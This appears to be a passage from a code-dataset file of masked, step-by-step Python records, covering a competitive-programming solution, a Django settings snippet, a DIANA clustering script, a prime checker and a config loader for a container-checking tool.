"step-4": "import sys\nn = int(input().strip())\na = list(input().strip().split(' '))\nH = list(input().strip().split(' '))\na = [int(i) for i in a]\nm = int(H[0])\nhmin = int(H[1])\nhmax = int(H[2])\npos = 0\nfound = 0\nd = a[-1] - a[0]\nif d == m:\n print(a[0])\nelif 0 < d < m:\n for i in range(hmin, hmax + 1):\n fin1 = a[0] - i + m\n if hmin <= fin1 - a[-1] <= hmax or fin1 == a[-1]:\n print(a[0] - i)\n found = 1\n break\nif found == 0:\n i = 0\n while i < n - 1:\n found = 0\n invalid = 0\n d = a[i + 1] - a[i]\n print(a[i], a[i + 1], d)\n if d < hmin or d > hmax:\n i = i + 1\n continue\n for j in range(i + 1, n):\n d = a[j] - a[j - 1]\n print(a[i], a[j], d)\n if d < hmin or d > hmax:\n i = j - 1\n invalid = 1\n break\n if a[j] - a[i] > m:\n invalid = 1\n break\n if a[j] - a[i] == m:\n found = 1\n invalid = 0\n break\n if invalid == 1:\n i = i + 1\n continue\n if found == 1 or a[-1] - a[i] + hmin <= m and a[-1] - a[i] + hmax >= m:\n print(a[i])\n break\n i = i + 1\nif n == 1:\n print(a[0] + hmax - m)\n",
"step-5": "import sys\n\nn=int(input().strip())\na=list(input().strip().split(' '))\nH=list(input().strip().split(' '))\na = [int(i) for i in a]\nm=int(H[0])\nhmin=int(H[1])\nhmax=int(H[2])\npos=0\nfound = 0\nd=a[-1]-a[0]\nif(d==m):\n print(a[0])\nelif(0<d<m):\n for i in range(hmin, hmax+1):\n fin1 = a[0]-i+m\n if(hmin<=fin1-a[-1]<=hmax or fin1==a[-1]):\n print(a[0]-i)\n found = 1\n break\nif(found == 0):\n i = 0 \n while(i<(n-1)):\n found = 0\n invalid = 0\n d = a[i+1]-a[i]\n print(a[i], a[i+1], d)\n if(d<hmin or d>hmax):\n i=i+1\n continue\n for j in range(i+1, n):\n d = a[j]-a[j-1]\n print(a[i], a[j], d)\n if(d<hmin or d>hmax):\n i = j-1\n invalid = 1\n break\n if(a[j]-a[i]>m):\n invalid = 1\n break\n if(a[j]-a[i]==m):\n found = 1\n invalid = 0\n break\n if(invalid == 1):\n i = i+1\n continue\n if(found == 1 or (a[-1]-a[i]+hmin<=m and a[-1]-a[i]+hmax>=m)): \n print(a[i])\n break\n i = i+1\nif(n == 1):\n print(a[0]+hmax-m)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from .base import *
import os
SECRET_KEY = os.environ['SECRET_KEY']
ALLOWED_HOSTS = ['demo.pythonic.nl']
DEBUG = False
|
normal
|
{
"blob_id": "e5607d9893b775b216d1790897124a673b190c26",
"index": 2085,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nSECRET_KEY = os.environ['SECRET_KEY']\nALLOWED_HOSTS = ['demo.pythonic.nl']\nDEBUG = False\n",
"step-3": "from .base import *\nimport os\nSECRET_KEY = os.environ['SECRET_KEY']\nALLOWED_HOSTS = ['demo.pythonic.nl']\nDEBUG = False\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#library
import pandas as pd
import numpy as np
import sys
from tqdm import tqdm # appear the precess of running situation.
import time
from scipy.spatial.distance import pdist, squareform
#0. Data Load
data = pd.read_csv(sys.argv[1], delimiter='\t') # Load train (input text file)
#1. Data Preprocessing
all_elements = [index for index in data.index] # Save index name.
#Make a distance metrix to compute dissimilarity.
distance_matrix = pdist(data, metric='euclidean')
dissimilarity_matrix = np.array(squareform(distance_matrix))
#dissimilarity_matrix = pd.DataFrame(squareform(distance_matrix), columns=all_elements, index=all_elements)
print(dissimilarity_matrix)
#2. Modeling : DIANA Clustering
#2-1. Compute dissimilarity average in ONE Cluster.
def avg_dissim_within_group_element(node, element_list):
max_diameter = -np.inf
sum_dissm = 0 #Set Sum equal zero.
for i in element_list:
sum_dissm += dissimilarity_matrix[node][i] #While iterate element_list, Sum the distance matrix value singly in a node.
if( dissimilarity_matrix[node][i] > max_diameter): #If distance matrix is bigger than max_distance,
max_diameter = dissimilarity_matrix[node][i] # that distance matrix value become a max_diameter.
if(len(element_list)>1):
avg = sum_dissm/(len(element_list)-1) # Average of distance matrix.
else:
avg = 0
return avg
# 2-2. Compute dissimilarity average between different Group(e.g. Cluster1 and Cluster2)
# id in sperated new group = splinter_list
def avg_dissim_across_group_element(node, main_list, splinter_list):
if len(splinter_list) == 0: #there is no spliter group, return zero.
return 0
sum_dissm = 0
for j in splinter_list:
sum_dissm = sum_dissm + dissimilarity_matrix[node][j] #Compute average between Object in splinter group
avg = sum_dissm/(len(splinter_list)) #and all object dissimilarity matrix.
return avg
# 2-3. Cluster Splinter
def splinter(main_list, splinter_group):
most_dissm_object_value = -np.inf #initate minus.
most_dissm_object_index = None
for node in main_list:
x = avg_dissim_within_group_element(node, main_list) # Previously, a point in main group as a standard.
y = avg_dissim_across_group_element(node, main_list, splinter_group) # a point in the seperated group.
diff = x - y # difference between X and Y
if diff > most_dissm_object_value:
most_dissm_object_value = diff
most_dissm_object_index = node # save index and value which has largest value between two groups.
if(most_dissm_object_value>0): # differnce is Plus, Create new splinter group. flag = 1
return (most_dissm_object_index, 1)
else: # difference is minus, flag = -1
return (-1, -1)
# 2-4. Split
def split(element_list):
main_list = element_list
splinter_group = []
(most_dissm_object_index, flag) = splinter(main_list, splinter_group)
while(flag > 0): # Iterate splinter function until a flag become minus.
main_list.remove(most_dissm_object_index) #Delete the most largest dissimilarity average object index in the main list.
splinter_group.append(most_dissm_object_index) # Then, append in the new splinter group.
(most_dissm_object_index, flag) = splinter(element_list, splinter_group)
return (main_list, splinter_group)
# 2-5. look for maximum distance in the current cluster.
def max_distance(cluster_list):
max_diameter_cluster_index = None
max_diameter_cluster_value = -np.inf
index = 0
for element_list in cluster_list:
for i in element_list: #columns
for j in element_list: #rows
#Switch the largest dissimilarity average object(index), value.
if dissimilarity_matrix[i][j] > max_diameter_cluster_value:
max_diameter_cluster_value = dissimilarity_matrix[i][j]
max_diameter_cluster_index = index
index +=1
if(max_diameter_cluster_value <= 0):
return -1
return max_diameter_cluster_index
# main
if __name__ == '__main__':
# Save arguments list
argv = sys.argv
# Set the number of cluster.
num_clusters = sys.argv[-1]
current_clusters = ([all_elements])
print(current_clusters)
level = 1
index = 0
with tqdm(total=100) as pbar:
while((index!=-1) and (level!=num_clusters)): #Proceed until the index equal -1 and setting number of cluster.
(a_clstr, b_clstr) = split(current_clusters[index])
del current_clusters[index] # Delete current cluster.
current_clusters.append(a_clstr) #original cluster
current_clusters.append(b_clstr) #splinter cluster
index = max_distance(current_clusters)
level +=1
pbar.update(10)
for i in range(num_clusters): # Save the results.
pd.DataFrame(current_clusters[i], columns=['id']).to_csv("%s_cluster_%d.txt" %(sys.argv[1], i), sep='\t')
|
normal
|
{
"blob_id": "267695555e876dc2fe5820dc194490aad9e5e344",
"index": 1361,
"step-1": "<mask token>\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list:\n for j in element_list:\n if dissimilarity_matrix[i][j] > max_diameter_cluster_value:\n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n index += 1\n if max_diameter_cluster_value <= 0:\n return -1\n return max_diameter_cluster_index\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint(dissimilarity_matrix)\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list:\n for j in element_list:\n if dissimilarity_matrix[i][j] > max_diameter_cluster_value:\n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n index += 1\n if max_diameter_cluster_value <= 0:\n return -1\n return max_diameter_cluster_index\n\n\nif __name__ == '__main__':\n argv = sys.argv\n num_clusters = sys.argv[-1]\n current_clusters = [all_elements]\n print(current_clusters)\n level = 1\n index = 0\n with tqdm(total=100) as pbar:\n while index != -1 and level != num_clusters:\n a_clstr, b_clstr = split(current_clusters[index])\n del current_clusters[index]\n current_clusters.append(a_clstr)\n current_clusters.append(b_clstr)\n index = max_distance(current_clusters)\n level += 1\n pbar.update(10)\n for i in range(num_clusters):\n pd.DataFrame(current_clusters[i], columns=['id']).to_csv(\n '%s_cluster_%d.txt' % (sys.argv[1], i), sep='\\t')\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport sys\nfrom tqdm import tqdm\nimport time\nfrom scipy.spatial.distance import pdist, squareform\ndata = pd.read_csv(sys.argv[1], delimiter='\\t')\nall_elements = [index for index in data.index]\ndistance_matrix = pdist(data, metric='euclidean')\ndissimilarity_matrix = np.array(squareform(distance_matrix))\nprint(dissimilarity_matrix)\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list:\n for j in element_list:\n if dissimilarity_matrix[i][j] > max_diameter_cluster_value:\n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n index += 1\n if max_diameter_cluster_value <= 0:\n return -1\n return max_diameter_cluster_index\n\n\nif __name__ == '__main__':\n argv = sys.argv\n num_clusters = sys.argv[-1]\n current_clusters = [all_elements]\n print(current_clusters)\n level = 1\n index = 0\n with tqdm(total=100) as pbar:\n while index != -1 and level != num_clusters:\n a_clstr, b_clstr = split(current_clusters[index])\n del current_clusters[index]\n current_clusters.append(a_clstr)\n current_clusters.append(b_clstr)\n index = max_distance(current_clusters)\n level += 1\n pbar.update(10)\n for i in range(num_clusters):\n pd.DataFrame(current_clusters[i], columns=['id']).to_csv(\n '%s_cluster_%d.txt' % (sys.argv[1], i), sep='\\t')\n",
"step-5": "#library\nimport pandas as pd\nimport numpy as np\nimport sys\n\nfrom tqdm import tqdm # appear the precess of running situation.\nimport time\n\nfrom scipy.spatial.distance import pdist, squareform\n\n#0. Data Load\ndata = pd.read_csv(sys.argv[1], delimiter='\\t') # Load train (input text file)\n\n#1. Data Preprocessing\nall_elements = [index for index in data.index] # Save index name.\n\n#Make a distance metrix to compute dissimilarity.\ndistance_matrix = pdist(data, metric='euclidean')\ndissimilarity_matrix = np.array(squareform(distance_matrix))\n#dissimilarity_matrix = pd.DataFrame(squareform(distance_matrix), columns=all_elements, index=all_elements)\nprint(dissimilarity_matrix)\n\n#2. Modeling : DIANA Clustering\n#2-1. Compute dissimilarity average in ONE Cluster. \ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0 #Set Sum equal zero.\n for i in element_list: \n sum_dissm += dissimilarity_matrix[node][i] #While iterate element_list, Sum the distance matrix value singly in a node.\n if( dissimilarity_matrix[node][i] > max_diameter): #If distance matrix is bigger than max_distance,\n max_diameter = dissimilarity_matrix[node][i] # that distance matrix value become a max_diameter.\n if(len(element_list)>1):\n avg = sum_dissm/(len(element_list)-1) # Average of distance matrix.\n else: \n avg = 0\n return avg\n\n# 2-2. Compute dissimilarity average between different Group(e.g. Cluster1 and Cluster2) \n# id in sperated new group = splinter_list\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0: #there is no spliter group, return zero.\n return 0 \n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j] #Compute average between Object in splinter group \n avg = sum_dissm/(len(splinter_list)) #and all object dissimilarity matrix.\n return avg\n\n# 2-3. Cluster Splinter\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf #initate minus.\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list) # Previously, a point in main group as a standard.\n y = avg_dissim_across_group_element(node, main_list, splinter_group) # a point in the seperated group.\n diff = x - y # difference between X and Y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node # save index and value which has largest value between two groups.\n if(most_dissm_object_value>0): # differnce is Plus, Create new splinter group. flag = 1\n return (most_dissm_object_index, 1)\n else: # difference is minus, flag = -1\n return (-1, -1)\n\n# 2-4. Split\ndef split(element_list):\n main_list = element_list\n splinter_group = [] \n (most_dissm_object_index, flag) = splinter(main_list, splinter_group)\n while(flag > 0): # Iterate splinter function until a flag become minus.\n main_list.remove(most_dissm_object_index) #Delete the most largest dissimilarity average object index in the main list.\n splinter_group.append(most_dissm_object_index) # Then, append in the new splinter group.\n (most_dissm_object_index, flag) = splinter(element_list, splinter_group)\n \n return (main_list, splinter_group)\n\n# 2-5. look for maximum distance in the current cluster.\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list: #columns\n for j in element_list: #rows\n #Switch the largest dissimilarity average object(index), value. \n if dissimilarity_matrix[i][j] > max_diameter_cluster_value: \n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n \n index +=1\n \n if(max_diameter_cluster_value <= 0):\n return -1\n \n return max_diameter_cluster_index\n\n# main\nif __name__ == '__main__':\n\n # Save arguments list\n argv = sys.argv \n\n # Set the number of cluster.\n num_clusters = sys.argv[-1]\n current_clusters = ([all_elements])\n print(current_clusters)\n level = 1\n index = 0\n\n with tqdm(total=100) as pbar:\n while((index!=-1) and (level!=num_clusters)): #Proceed until the index equal -1 and setting number of cluster.\n (a_clstr, b_clstr) = split(current_clusters[index])\n del current_clusters[index] # Delete current cluster.\n current_clusters.append(a_clstr) #original cluster\n current_clusters.append(b_clstr) #splinter cluster\n index = max_distance(current_clusters)\n level +=1\n pbar.update(10)\n\n for i in range(num_clusters): # Save the results.\n pd.DataFrame(current_clusters[i], columns=['id']).to_csv(\"%s_cluster_%d.txt\" %(sys.argv[1], i), sep='\\t') \n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
def primo(num):
if num < 1:
print(f"El numero {num} no es primo")
return None
else:
if num == 2:
print(f"El numero {num} es primo")
return None
else:
for i in range(2, num):
if num % i == 0:
print(f"El numero {num} no es primo")
return None
print(f"El numero {num} es primo")
def leerNumero():
numer = int(input("Escribe un numero ==> "))
primo(numer)
def main():
leerNumero()
if __name__ =="__main__":
main()
|
normal
|
{
"blob_id": "29eb1a1642d38160c138733e269bb3ba0c5d4bba",
"index": 9834,
"step-1": "<mask token>\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\n<mask token>\n",
"step-3": "def primo(num):\n if num < 1:\n print(f'El numero {num} no es primo')\n return None\n elif num == 2:\n print(f'El numero {num} es primo')\n return None\n else:\n for i in range(2, num):\n if num % i == 0:\n print(f'El numero {num} no es primo')\n return None\n print(f'El numero {num} es primo')\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\n<mask token>\n",
"step-4": "def primo(num):\n if num < 1:\n print(f'El numero {num} no es primo')\n return None\n elif num == 2:\n print(f'El numero {num} es primo')\n return None\n else:\n for i in range(2, num):\n if num % i == 0:\n print(f'El numero {num} no es primo')\n return None\n print(f'El numero {num} es primo')\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\ndef primo(num):\n if num < 1:\n print(f\"El numero {num} no es primo\")\n return None\n else:\n if num == 2:\n print(f\"El numero {num} es primo\")\n return None\n else:\n for i in range(2, num):\n if num % i == 0:\n print(f\"El numero {num} no es primo\")\n return None\n print(f\"El numero {num} es primo\") \n\n\ndef leerNumero():\n numer = int(input(\"Escribe un numero ==> \"))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\nif __name__ ==\"__main__\":\n main() ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import json
import os
from six import iteritems
from ..exceptions import ColinConfigException
from ..constant import CONFIG_DIRECTORY, JSON
from ..loader import load_check_implementation
from ..target import is_compatible
class Config(object):
def __init__(self, name=None):
"""
Load config for colin.
:param name: str (name of the config file (without .json), default is "default"
"""
self.name = name or "default"
config_path = os.path.join(get_config_directory(), self.name + JSON)
try:
with open(config_path, mode='r') as config_file:
self.config_dict = json.load(config_file)
except Exception as ex:
raise ColinConfigException("Config file '{}' cannot be loaded.".format(config_path))
def get_checks(self, target_type, group=None, severity=None, tags=None):
"""
Get all checks for given type/group/severity/tags.
:param target_type: TargetType enum
:param group: str (if not group, get checks from all groups/directories)
:param severity: str (optional x required)
:param tags: list of str
:return: list of check instances
"""
check_files = self._get_check_files(group=group,
severity=severity)
groups = {}
for (group, check_files) in iteritems(check_files):
checks = []
for severity, check_file in check_files:
check_classes = load_check_implementation(path=check_file, severity=severity)
for check_class in check_classes:
if is_compatible(target_type, check_class, severity, tags):
checks.append(check_class)
groups[group] = checks
return groups
@staticmethod
def get_check_file(group, name):
"""
Get the check file from given group with given name.
:param group: str
:param name: str
:return: str (path)
"""
return os.path.join(get_checks_path(), group, name + ".py")
@staticmethod
def get_check_files(group, names, severity):
"""
Get the check files from given group with given names.
:param severity: str
:param group: str
:param names: list of str
:return: list of str (paths)
"""
check_files = []
for f in names:
check_file = Config.get_check_file(group=group,
name=f)
check_files.append((severity, check_file))
return check_files
def _get_check_groups(self, group=None):
"""
Get check group to validate
:param group: str (if None, all from the config will be used)
:return: list of str (group names)
"""
groups = [g for g in self.config_dict]
if group:
if group in groups:
check_groups = [group]
else:
check_groups = []
else:
check_groups = groups
return check_groups
def _get_check_files(self, group=None, severity=None):
"""
Get file names with checks filtered by group and severity.
:param group: str (if None, all groups will be used)
:param severity: str (if None, all severities will be used)
:return: list of str (absolute paths)
"""
groups = {}
for g in self._get_check_groups(group):
check_files = []
for sev, files in iteritems(self.config_dict[g]):
if (not severity) or severity == sev:
check_files += Config.get_check_files(group=g,
names=files,
severity=sev)
groups[g] = check_files
return groups
def get_checks_path():
"""
Get path to checks.
:return: str (absolute path of directory with checks)
"""
rel_path = os.path.join(os.pardir, os.pardir, os.pardir, "checks")
return os.path.abspath(os.path.join(__file__, rel_path))
def get_config_directory():
"""
Get the directory with config files
:return: str
"""
local_share = os.path.join(os.path.expanduser("~"),
".local",
CONFIG_DIRECTORY)
if os.path.isdir(local_share) and os.path.exists(local_share):
return local_share
usr_local_share = os.path.join("/usr/local", CONFIG_DIRECTORY)
if os.path.isdir(usr_local_share) and os.path.exists(usr_local_share):
return usr_local_share
raise ColinConfigException("Config directory cannot be found.")
|
normal
|
{
"blob_id": "7bb9455e6f0c15ab0be6963cff06ff41df73e6e0",
"index": 2583,
"step-1": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + '.py')\n <mask token>\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + '.py')\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group, name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return 